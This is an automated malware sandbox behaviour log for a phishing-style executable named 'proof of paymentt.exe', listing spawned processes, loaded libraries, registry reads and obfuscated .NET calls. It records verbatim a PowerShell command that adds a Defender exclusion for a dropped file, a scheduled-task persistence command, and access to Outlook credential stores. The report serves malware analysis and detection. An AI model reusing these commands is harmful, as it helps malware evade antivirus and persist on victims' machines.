Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Process created: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe "C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe"
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2492 --field-trial-handle=2368,i,2695784621935690573,1694609991167006164,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process created: C:\Users\user\Desktop\proof of paymentt.exe "C:\Users\user\Desktop\proof of paymentt.exe" /stext "C:\Users\user\AppData\Local\Temp\vtvkcyiauscpqjziosjypht"
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process created: C:\Users\user\Desktop\proof of paymentt.exe "C:\Users\user\Desktop\proof of paymentt.exe" /stext "C:\Users\user\AppData\Local\Temp\vtvkcyiauscpqjziosjypht"
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process created: C:\Users\user\Desktop\proof of paymentt.exe "C:\Users\user\Desktop\proof of paymentt.exe" /stext "C:\Users\user\AppData\Local\Temp\foaddqtciauctxnmgdeaamokiq"
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process created: C:\Users\user\Desktop\proof of paymentt.exe "C:\Users\user\Desktop\proof of paymentt.exe" /stext "C:\Users\user\AppData\Local\Temp\qqgoejdwwimhddbqpnrbdyitqektl"
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process created: C:\Users\user\Desktop\proof of paymentt.exe "C:\Users\user\Desktop\proof of paymentt.exe" /stext "C:\Users\user\AppData\Local\Temp\qqgoejdwwimhddbqpnrbdyitqektl"
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe"	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mQpdTSxCjbPop" /XML "C:\Users\user\AppData\Local\Temp\tmp73D0.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process created: C:\Users\user\Desktop\proof of paymentt.exe "C:\Users\user\Desktop\proof of paymentt.exe"	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process created: C:\Users\user\Desktop\proof of paymentt.exe "C:\Users\user\Desktop\proof of paymentt.exe" /stext "C:\Users\user\AppData\Local\Temp\vtvkcyiauscpqjziosjypht"	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process created: C:\Users\user\Desktop\proof of paymentt.exe "C:\Users\user\Desktop\proof of paymentt.exe" /stext "C:\Users\user\AppData\Local\Temp\vtvkcyiauscpqjziosjypht"	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process created: C:\Users\user\Desktop\proof of paymentt.exe "C:\Users\user\Desktop\proof of paymentt.exe" /stext "C:\Users\user\AppData\Local\Temp\foaddqtciauctxnmgdeaamokiq"	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process created: C:\Users\user\Desktop\proof of paymentt.exe "C:\Users\user\Desktop\proof of paymentt.exe" /stext "C:\Users\user\AppData\Local\Temp\qqgoejdwwimhddbqpnrbdyitqektl"	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process created: C:\Users\user\Desktop\proof of paymentt.exe "C:\Users\user\Desktop\proof of paymentt.exe" /stext "C:\Users\user\AppData\Local\Temp\qqgoejdwwimhddbqpnrbdyitqektl"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mQpdTSxCjbPop" /XML "C:\Users\user\AppData\Local\Temp\tmp7E5F.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Process created: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe "C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2492 --field-trial-handle=2368,i,2695784621935690573,1694609991167006164,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: pstorec.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: wldp.dll
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: pstorec.dll
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: wldp.dll
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\proof of paymentt.exe	Section loaded: cryptbase.dll

Source: C:\Users\user\Desktop\proof of paymentt.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\proof of paymentt.exe

File opened: C:\Users\user\Desktop\proof of paymentt.cfg

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\proof of paymentt.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\proof of paymentt.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts

Source: proof of paymentt.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: proof of paymentt.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: proof of paymentt.exe, Form1.cs	.Net Code: LateBinding.LateCall((object)methodInfo, (Type)null, "Invoke", new object[2]{0,new string[3]{BN[0],BN[1],"VPBiblioteka"}}, (string[])null, (bool[])null)
Source: 0.2.proof of paymentt.exe.6da0000.7.raw.unpack, XG.cs	.Net Code: Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777298)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777243)),Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777254))})
Source: 0.2.proof of paymentt.exe.2c58f94.0.raw.unpack, XG.cs	.Net Code: Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777298)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777243)),Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777254))})
